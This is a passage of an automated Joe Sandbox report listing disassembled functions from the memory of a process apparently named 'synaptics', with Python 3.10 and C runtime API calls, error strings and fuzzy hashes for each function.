                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\longobject.c
                                                                                                                                                                                                      • API String ID: 376477240-3761076943
                                                                                                                                                                                                      • Opcode ID: c9850690cb3dbcf6cc7caded786c0264345678eb938fdfeb7179bf14ad95161e
                                                                                                                                                                                                      • Instruction ID: d12cc164b6a6f8c5507fb44051033efa8746c2997e2598d41d8aab4a3c1fe540
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9850690cb3dbcf6cc7caded786c0264345678eb938fdfeb7179bf14ad95161e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB01F573B0112417CA24DA6DAC45D9AB799DB8527AB24037DF92CC7BD0DF12DC1683E1
                                                                                                                                                                                                      Function 6C46AFD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?,00000000,?,?,?,?,6C46B3F4), ref: 6C46AFF8
                                                                                                                                                                                                        • Part of subcall function 6C4EE8B0: _PyUnicode_Ready.PYTHON310(?,00000000,?,?,6C476DF8,00000000,00000000,?,00000000,?,?,?,?,00000001), ref: 6C4EE8ED
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6C46B3F4), ref: 6C46B037
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$Err_InternObjectPlaceReady
                                                                                                                                                                                                      • String ID: @Btl$non-string found in code slot
                                                                                                                                                                                                      • API String ID: 3964163781-3733840624
                                                                                                                                                                                                      • Opcode ID: d48afe9b81d62eb1d9bc27c53bb40b1e2b0e2e59c5bb400e544521566aa40cd5
                                                                                                                                                                                                      • Instruction ID: dab04cd81ea4f50bf00c5d84081b4b52fc40cedc348ccbd248c5a2695180f9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d48afe9b81d62eb1d9bc27c53bb40b1e2b0e2e59c5bb400e544521566aa40cd5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C016B33B001145BDA10C96A9C41F5677B8DB4223AF144378FA3C97FD5E621FC0692E6
                                                                                                                                                                                                      Function 6C44E920 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,?,00000000,00000000,?,6C44EC18,80000001,00000000), ref: 6C44E960
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,?,6C44EC18,00000001,00000000), ref: 6C44E978
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get,?,00000000,?,6C44EC18), ref: 6C44E98B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallCheckError_FatalFunctionMakeObject_ResultTstate
                                                                                                                                                                                                      • String ID: PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 1083775403-1068966796
                                                                                                                                                                                                      • Opcode ID: 8a4d6c2b56b4f3a5ec1ca75d92419a2b34cb6bbc597600977b31e6ec9f3315b9
                                                                                                                                                                                                      • Instruction ID: 3bb5251c96e30e211a5c93bec0ee6270f3662b6486ba93de9a0c7702b5dcad77
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a4d6c2b56b4f3a5ec1ca75d92419a2b34cb6bbc597600977b31e6ec9f3315b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0AF75602604BAE320DA598D41FAFB7ACDB81A15F208059FD14A7A80D760AA04D6F1
                                                                                                                                                                                                      Function 73A82FA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlUnwind.KERNEL32(?,73A82FF2,80000026,00000000,?,?), ref: 73A82FED
                                                                                                                                                                                                      • _local_unwind2.VCRUNTIME140(?,?,?), ref: 73A83034
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unwind_local_unwind2
                                                                                                                                                                                                      • String ID: &$02CV
                                                                                                                                                                                                      • API String ID: 2435528123-3673091860
                                                                                                                                                                                                      • Opcode ID: 20329577499a8a19e03f04f4c2137c8241b8afa4a76f9821cb8fe30fc60e68c5
                                                                                                                                                                                                      • Instruction ID: fc877768b6400ace3521a238e2723991258b698d21e002af0cb60daf3eb52214
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20329577499a8a19e03f04f4c2137c8241b8afa4a76f9821cb8fe30fc60e68c5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66119D759002148FEB02DF44C982BDAB7B8FF08340F144556D845AB38AC776EC85CBE2
                                                                                                                                                                                                      Function 6C47FAE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySys_Audit.PYTHON310(setopencodehook,00000000), ref: 6C47FAFB
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000), ref: 6C47FB41
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • failed to change existing open_code hook, xrefs: 6C47FB2A
                                                                                                                                                                                                      • setopencodehook, xrefs: 6C47FAF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AuditErr_ObjectSys_
                                                                                                                                                                                                      • String ID: failed to change existing open_code hook$setopencodehook
                                                                                                                                                                                                      • API String ID: 1139801659-2341440578
                                                                                                                                                                                                      • Opcode ID: 1bb14fe882c07c77bdc84adf98fa61af1391cdb381380fc8bacc027563d6e919
                                                                                                                                                                                                      • Instruction ID: a7ddd9505a23269358998802add11959398e7e06282719a8fffdf4fe7f76306f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bb14fe882c07c77bdc84adf98fa61af1391cdb381380fc8bacc027563d6e919
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A711A531B022049BEA10DE6D9C05F9677E4DB4277AF104279E828D77D0D671F805C7B6
                                                                                                                                                                                                      Function 6C58CF70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(expect int, got %s,?), ref: 6C58CF95
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      • PyLong_AsLongLong.PYTHON310(?), ref: 6C58CFA6
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(00000000,6C73BD78), ref: 6C58CFD4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatLong$ClearExceptionFromGivenLong_MatchesObjectUnicode_
                                                                                                                                                                                                      • String ID: expect int, got %s
                                                                                                                                                                                                      • API String ID: 3446644568-24237672
                                                                                                                                                                                                      • Opcode ID: 3bb2dbed2a155a56f9b522c12a7c1095a419ba3d71c8b58433f9ac1b411df984
                                                                                                                                                                                                      • Instruction ID: 30ebdce80a2f23e6557e927e8e0108c22b68d9d6fde5dca33a1673451697f920
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bb2dbed2a155a56f9b522c12a7c1095a419ba3d71c8b58433f9ac1b411df984
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2901B5717161249FDB04DF78EC01AA53BA99B46339F1443A9FC288BBE1DB62E850C7D1
                                                                                                                                                                                                      Function 6C4D2AA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73C9A8,Negative size passed to PyUnicode_FromStringAndSize), ref: 6C4D2AC8
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyUnicode_FromStringAndSize(NULL, size) is deprecated; use PyUnicode_New() instead, xrefs: 6C4D2AF9
                                                                                                                                                                                                      • Negative size passed to PyUnicode_FromStringAndSize, xrefs: 6C4D2AC1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: Negative size passed to PyUnicode_FromStringAndSize$PyUnicode_FromStringAndSize(NULL, size) is deprecated; use PyUnicode_New() instead
                                                                                                                                                                                                      • API String ID: 1622067708-916305293
                                                                                                                                                                                                      • Opcode ID: cf43f6b9ea37bb0afbd0856d77259b61aa36977a52304740d593c02f742ee191
                                                                                                                                                                                                      • Instruction ID: c249fa70a3514847ec27a512c9ae5a5e9acf9753d46b892ed828b8919d563840
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf43f6b9ea37bb0afbd0856d77259b61aa36977a52304740d593c02f742ee191
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBF0F932B5522823DD30E5146C16F9A33588B9162DF050199EC0C6BF80FE92BD1042D6
                                                                                                                                                                                                      Function 6C492460 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,0000029A), ref: 6C492485
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\longobject.c, xrefs: 6C492474
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C492479
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\longobject.c
                                                                                                                                                                                                      • API String ID: 376477240-3761076943
                                                                                                                                                                                                      • Opcode ID: 191192fe98c1cf51e9dc633219e87ee5c54a5bc15b4c01d52b7b88e974b72149
                                                                                                                                                                                                      • Instruction ID: aa950cbe8b3a2034f555f509803b2134813fb56e5cc309eb15a5b713f0c81c83
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 191192fe98c1cf51e9dc633219e87ee5c54a5bc15b4c01d52b7b88e974b72149
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70F0497270022067C638DA69AC05E9A3BA95F8177AB040328F42D87FD1DF15E846C3D0
                                                                                                                                                                                                      Function 6C47C860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s attribute must be bytes,object), ref: 6C47C895
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %.200s attribute must be bytes$%.200s attribute not set$object
                                                                                                                                                                                                      • API String ID: 376477240-859189838
                                                                                                                                                                                                      • Opcode ID: 34c6bf3982aac7f3e342702139906520620672eacf34344c4f542433fc4db60e
                                                                                                                                                                                                      • Instruction ID: f676642fca90b4a1f503d5f1287214224b8ca5bcc2d2e1107ea279d05cc76f0a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34c6bf3982aac7f3e342702139906520620672eacf34344c4f542433fc4db60e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 880188317441059FC320DF59D840D85B7F5FF85339B258669E9588B792C772E8868B90
                                                                                                                                                                                                      Function 6C4B4C70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,00000000,00000000,00000000), ref: 6C4B4CA2
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,00000000,00000000,00000000,00000000), ref: 6C4B4CB5
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get,?,00000000,6C4B7C4F,?,?,?), ref: 6C4B4CC5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallCheckError_FatalFunctionMakeObject_ResultTstate
                                                                                                                                                                                                      • String ID: PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 1083775403-1068966796
                                                                                                                                                                                                      • Opcode ID: 608a3e0e711f8868e13fd600d3338a77a9ccc02daac70f651ff54a4c7474a29c
                                                                                                                                                                                                      • Instruction ID: 81c17835ec804e2d16c3e1faf36633be4d82a630a6d2d339e1e69ff3eb37d4aa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 608a3e0e711f8868e13fd600d3338a77a9ccc02daac70f651ff54a4c7474a29c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0E2363016103AE230950AAC02FA762699FC2F69F224419BA24ABBC4C760B80681F5
                                                                                                                                                                                                      Function 6C450E80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object cannot be interpreted as an integer, xrefs: 6C450F43
